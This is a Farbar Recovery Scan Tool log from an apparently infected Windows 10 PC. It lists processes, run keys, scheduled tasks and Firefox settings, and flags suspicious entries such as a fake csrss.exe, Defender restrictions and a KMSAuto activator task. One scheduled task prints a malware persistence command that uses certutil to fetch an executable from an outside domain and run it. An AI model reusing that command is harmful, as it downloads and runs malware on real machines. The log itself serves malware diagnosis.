Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 24-11-2019
Ran by SR (administrator) on DESKTOP-A0OS1Q6 (Gigabyte Technology Co., Ltd. To be filled by O.E.M.) (24-11-2019 19:50:32)
Running from D:\Users\SR\Downloads
Loaded Profiles: SR (Available Profiles: SR & Administrator)
Platform: Windows 10 Pro Version 1803 17134.345 (X64) Language: English (United States)
Default browser: FF
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

( ) [File not signed] C:\Users\SR\AppData\Local\Temp\is-2HG9K.tmp\Guitar.exe
() [File not signed] C:\Program Files (x86)\DSDCS\InputMapper HidGuardian\InputMapperCerberusWhitelister.exe
() [File not signed] C:\Users\SR\AppData\Local\Temp\is-FML3U.tmp\Guitar.tmp
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Adobe Systems Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Brio) [File not signed] C:\Program Files\FolderSize\FolderSizeSvc.exe
(Creative Labs Inc -> Creative Technology Ltd) C:\Windows\SysWOW64\CtHelper.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe
(Dropbox, Inc -> The Qt Company Ltd.) C:\Program Files (x86)\Dropbox\Client\85.4.155\QtWebEngineProcess.exe
(Dropbox, Inc -> The Qt Company Ltd.) C:\Program Files (x86)\Dropbox\Client\85.4.155\QtWebEngineProcess.exe
(Dropbox, Inc -> The Qt Company Ltd.) C:\Program Files (x86)\Dropbox\Client\85.4.155\QtWebEngineProcess.exe
(IDRIX -> IDRIX) C:\Program Files\VeraCrypt\VeraCrypt.exe
(Invincea, Inc. -> Sandboxie Holdings, LLC) C:\Program Files\Sandboxie\SbieCtrl.exe
(Invincea, Inc. -> Sandboxie Holdings, LLC) C:\Program Files\Sandboxie\SbieSvc.exe
(Invincea, Inc. -> Sandboxie Holdings, LLC) C:\Program Files\Sandboxie\SbieSvc.exe
(Logitech Inc -> Logitech) C:\ProgramData\Logishrd\LogiOptions\Software\Current\LogiOverlay.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\Common Files\Logishrd\KHAL3\KHALMNPR.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\Logitech\LogiOptions\LogiOptions.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\Logitech\SetPointP\SetPoint.exe
(Logitech Inc -> Logitech, Inc.) C:\ProgramData\Logishrd\LogiOptions\Software\Current\LogiOptionsMgr.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Microsoft Windows -> Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1910.4-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1910.4-0\NisSrv.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(NVIDIA Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Open Source Developer, Phillip Gibbons -> Highresolution Enterprises) C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\XMouseButtonControl.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(PACE Anti-Piracy, Inc. -> PACE Anti-Piracy, Inc.) C:\Program Files (x86)\Common Files\PACE\Services\LicenseServices\LDSvc.exe
(Polenter - Pawel Idzikowski -> Polenter - Software Solutions) C:\Program Files (x86)\Desktop-Reminder 2\DesktopReminder2.exe
(Reprise Software Inc.) [File not signed] C:\Program Files (x86)\The Foundry\LicensingTools7.0\bin\RLM\rlm.foundry.exe
(Reprise Software Inc.) [File not signed] C:\Program Files (x86)\The Foundry\LicensingTools7.0\bin\RLM\rlm.foundry.exe
(TeamViewer GmbH -> TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(WinAbility Software Corporation -> WinAbility® Software Corporation) C:\Program Files\IconShepherd\ISEXE64.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [638872 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM\...\Run: [XMouseButtonControl] => C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\XMouseButtonControl.exe [1605856 2019-08-18] (Open Source Developer, Phillip Gibbons -> Highresolution Enterprises)
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2872400 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\System32\LogiLDA.dll [3933496 2012-09-20] (Logitech -> Logitech, Inc.)
HKLM\...\Run: [AsioReg] => REGSVR32.EXE /S CTASIO.DLL*
HKLM\...\Run: [LogiOptions] => C:\Program Files\Logitech\LogiOptions\LogiOptions.exe [2176648 2018-06-18] (Logitech Inc -> Logitech, Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [302904 2019-01-18] (Apple Inc. -> Apple Inc.)
HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [3136136 2019-01-30] (Logitech Inc -> Logitech, Inc.)
HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [6260544 2019-11-14] (Dropbox, Inc -> Dropbox, Inc.)
HKLM-x32\...\Run: [AsioThk32Reg] => REGSVR32.EXE /S CTASIO.DLL
HKLM-x32\...\Run: [CTHelper] => C:\Windows\SysWOW64\CTHELPER.EXE* [23040 2009-02-23] () [File not signed]
HKLM-x32\...\Run: [CTxfiHlp] => C:\Windows\SysWOW64\CTXFIHLP.EXE* [23552 2009-02-23] () [File not signed]
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [645648 2019-10-05] (Oracle America, Inc. -> Oracle Corporation)
HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\ DisallowedCertificates: 7D4EAFF45C5D8A3E9AB24486D12F4B4F7F4DBB60 (U)
HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3199776 2018-04-03] (Valve -> Valve Corporation)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [DesktopReminder2ByPolenter] => C:\Program Files (x86)\Desktop-Reminder 2\DesktopReminder2.exe [3164048 2017-06-21] (Polenter - Pawel Idzikowski -> Polenter - Software Solutions)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [SandboxieControl] => C:\Program Files\Sandboxie\SbieCtrl.exe [3682968 2019-04-22] (Invincea, Inc. -> Sandboxie Holdings, LLC)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [Viber] => C:\Users\SR\AppData\Local\Viber\Viber.exe [38564936 2019-10-30] (Viber Media S.à r.l. -> Viber Media S.à r.l.)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [GreenResonance] => C:\WINDOWS\rss\csrss.exe [3937792 2019-11-24] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [7890540] => C:\Users\SR\AppData\Local\Temp\is-2HG9K.tmp\Guitar.exe [877745 2019-11-24] ( ) [File not signed] <==== ATTENTION
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [CloudNet] => C:\Users\SR\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-11-24] (EpicNet Inc.) [File not signed] <==== ATTENTION
HKLM\Software\...\Authentication\Credential Providers: [{AA96996E-48DD-4D31-A94D-8563298A8C2D}] -> C:\WINDOWS\system32\WACP.dll [2016-09-20] (Softomotive Ltd -> )
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Icon Shepherd.lnk [2019-10-31]
ShortcutTarget: Icon Shepherd.lnk -> C:\Program Files\IconShepherd\ISEXE64.exe (WinAbility Software Corporation -> WinAbility® Software Corporation)
GroupPolicy: Restriction - Firefox <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0E55825A-221F-4E7A-9416-6D13AA06ABD8} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.)
Task: {12152F8B-CD2F-42DE-A539-041A8A936465} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {14324AB2-DEA1-4205-8D09-E4BC117610AE} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [24668024 2019-11-18] (Microsoft Corporation -> Microsoft Corporation)
Task: {15D1F9B6-04A3-4972-A83C-EF0F4BBB8427} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [899056 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {1B9C5A1B-9321-46BB-84C5-DF45191FF376} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [648504 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {2208EA4A-30D8-45CC-8BDD-7FC3B05195B5} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [1374008 2019-11-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {42596E64-0421-415A-9C21-4EC99F971F53} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {42CF4929-54EE-42D2-B729-F538516C85C2} - System32\Tasks\JumpingBytes\PureSyncVSS => C:\Program Files (x86)\Jumping Bytes\PureSync\PureSyncVSSStart.exe [35656 2016-06-16] (Jumping Bytes (Christoph Guentner) -> Jumping Bytes)
Task: {66B093E3-0989-45FD-B21D-EE39713B7201} - System32\Tasks\KMSAutoNet => C:\ProgramData\KMSAutoS\KMSAuto Net.exe
Task: {78A0CAD1-8991-4E6C-966D-4E69097977E8} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {7F8AE7BB-B4DE-4B22-9729-1E5E19704D1A} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {881D3DFF-B43A-44C2-820D-F54679FAE900} - System32\Tasks\EPSON L130 Series Update {3D66A2C6-B96B-41F2-80E9-2A3BE5BE4140} => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSN6E.EXE [690536 2013-11-22] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
Task: {93894B49-495F-4FF7-A834-F07A572C2C25} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [1374008 2019-11-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {950BA929-9185-474B-B254-40BA3B8E3A1B} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [112976 2019-11-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {962642C0-4430-4032-92EE-908F3A5F3E52} - System32\Tasks\ExclusiveTool => C:\Program Files (x86)\DSDCS\InputMapper\ExclusiveModeTool.exe [19968 2016-10-04] (InputMapper) [File not signed]
Task: {99C2988F-4978-44CF-9C99-C8698A7E4DD0} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [24668024 2019-11-18] (Microsoft Corporation -> Microsoft Corporation)
Task: {9FAB49BF-9A8A-43A8-A5BF-493EE72EF726} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [616320 2018-01-08] (Apple Inc. -> Apple Inc.)
Task: {A197B1E1-5017-44E1-8786-700A5A077A97} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [112976 2019-11-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {A2CB4A3E-AFDC-43FA-98BA-0A92F7E5DABE} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [899056 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {A809944B-8D1B-4F63-BB06-E2CD920F61A2} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [4321688 2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Task: {AD74C57C-54F0-4805-B7A0-CB5A9FA03223} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2872400 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {B264C95D-A9B6-4D69-9B94-FB67D6DB757E} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.)
Task: {B69A753B-777A-4C1E-AA9D-1033C77839DE} - System32\Tasks\CreateExplorerShellUnelevatedTask => C:\WINDOWS\explorer.exe /NOUACCHECK
Task: {B6C27676-7B71-492F-BB86-892E15752F97} - System32\Tasks\csrss => C:\WINDOWS\rss\csrss.exe [3937792 2019-11-24] () [File not signed] <==== ATTENTION
Task: {C68E190A-5D0C-40B1-895A-9522150D9369} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {C789D50A-A2A0-405F-B279-A59DBA0D126E} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://tfortytimes.com/app/app.exe C:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {CCC37DAD-9377-4ED5-80DB-F21C8D60E2E6} - System32\Tasks\NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {D34CA7D5-150E-4A42-9C1F-D72B477043A6} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {DC559262-3918-4E5A-B027-44ED71265B49} - System32\Tasks\JumpingBytes\PureSyncExit => C:\Program Files (x86)\Jumping Bytes\PureSync\PureSyncAdmin.exe [105808 2018-11-12] (Jumping Bytes (Christoph Guentner) -> Jumping Bytes)
Task: {E02831A3-E4D2-410D-9AAC-0268EE1483DF} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {F1C3AFE7-5B89-4B71-8D62-12804C3764B1} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {F7413A74-A9B1-4E6A-91D4-0570477CA0ED} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3787304 2019-05-23] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {F9DCD18B-6730-49E0-8339-A8013E910822} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [4321688 2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Task: {FEF2A145-6CB7-48B3-827C-4FFCF30E20F1} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\EPSON L130 Series Update {3D66A2C6-B96B-41F2-80E9-2A3BE5BE4140}.job => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSN6E.EXE:/EXE:{3D66A2C6-B96B-41F2-80E9-2A3BE5BE4140} /F:UpdateWORKGROUP\DESKTOP-A0OS1Q6$ĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

ProxyServer: [S-1-5-21-3967059023-4107875624-2872843465-1001] => http=127.0.0.1:8888;
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 1.1.1.1 1.0.0.1
Tcpip\..\Interfaces\{2a8e95f9-250a-4cdc-8d08-f661e3f2a913}: [DhcpNameServer] 1.1.1.1 1.0.0.1

Internet Explorer:
==================
SearchScopes: HKLM -> DefaultScope value is missing
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_231\bin\ssv.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation)
BHO: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\SetPointSmooth.dll [2019-01-30] (Logitech Inc -> Logitech, Inc.)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_231\bin\jp2ssv.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\32-bit\SetPointSmooth.dll [2019-01-30] (Logitech Inc -> Logitech, Inc.)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)

FireFox:
========
FF DefaultProfile: qyonbq05.default-1454591260015
FF ProfilePath: C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release [2019-11-24]
FF Notifications: Mozilla\Firefox\Profiles\dho1fb01.default-release -> hxxps://mail-notification.info
FF Extension: (DuckDuckGo Privacy Essentials) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release\Extensions\jid1-ZAdIEUB7XOzOJw@jetpack.xpi [2019-10-27]
FF Extension: (Skip Redirect) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release\Extensions\skipredirect@sblask.xpi [2019-11-15]
FF Extension: (Adblocker Lite) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release\Extensions\{3596f810-bf50-47e2-b54a-2128ebdc5179}.xpi [2019-06-05]
FF ProfilePath: C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 [2019-11-24]
FF DownloadDir: D:\Users\SR\Downloads
FF NewTab: Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 -> about:newtab
FF NetworkProxy: Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 -> type", 0
FF Notifications: Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 -> hxxps://mail-notification.info
FF Extension: (Disconnect) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\2.0@disconnect.me.xpi [2019-04-15]
FF Extension: (Grammarly for Firefox) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\87677a2c52b84ad3a151a4a72f5bd3c4@jetpack.xpi [2019-02-04]
FF Extension: (AdGuard AdBlocker) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\adguardadblocker@adguard.com.xpi [2019-04-17]
FF Extension: (Block Site) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\{54e2eb33-18eb-46ad-a4e4-1329c29f6e17}.xpi [2019-05-01]
FF Extension: (Adblock Plus - free ad blocker) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2019-04-20]
FF Extension: (No Name) - C:\Program Files\Mozilla Firefox\browser\features\{EBA45A79-A229-44D3-A606-3DADEAC6A066}.xpi [2019-08-11] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt
FF Extension: (Logitech SetPoint) - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2019-10-19] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_32_0_0_223.dll [2019-08-04] (Adobe Inc. -> )
FF Plugin: @itools.hk/npiTools, version=1.0.0 -> C:\Program Files (x86)\ThinkSky\iTools 3\Extensions\npiTools.dll [2017-05-26] (Shenzhen Thinksky Technology Co.,Ltd -> )
FF Plugin: @java.com/DTPlugin,version=11.231.2 -> C:\Program Files\Java\jre1.8.0_231\bin\dtplugin\npDeployJava1.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.231.2 -> C:\Program Files\Java\jre1.8.0_231\bin\plugin2\npjp2.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-10-25] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_223.dll [2019-08-04] (Adobe Inc. -> )
FF Plugin-x32: @itools.hk/npiTools, version=1.0.0 -> C:\Program Files (x86)\ThinkSky\iTools 3\Extensions\npiTools.dll [2017-05-26] (Shenzhen Thinksky Technology Co.,Ltd -> )
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2018-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
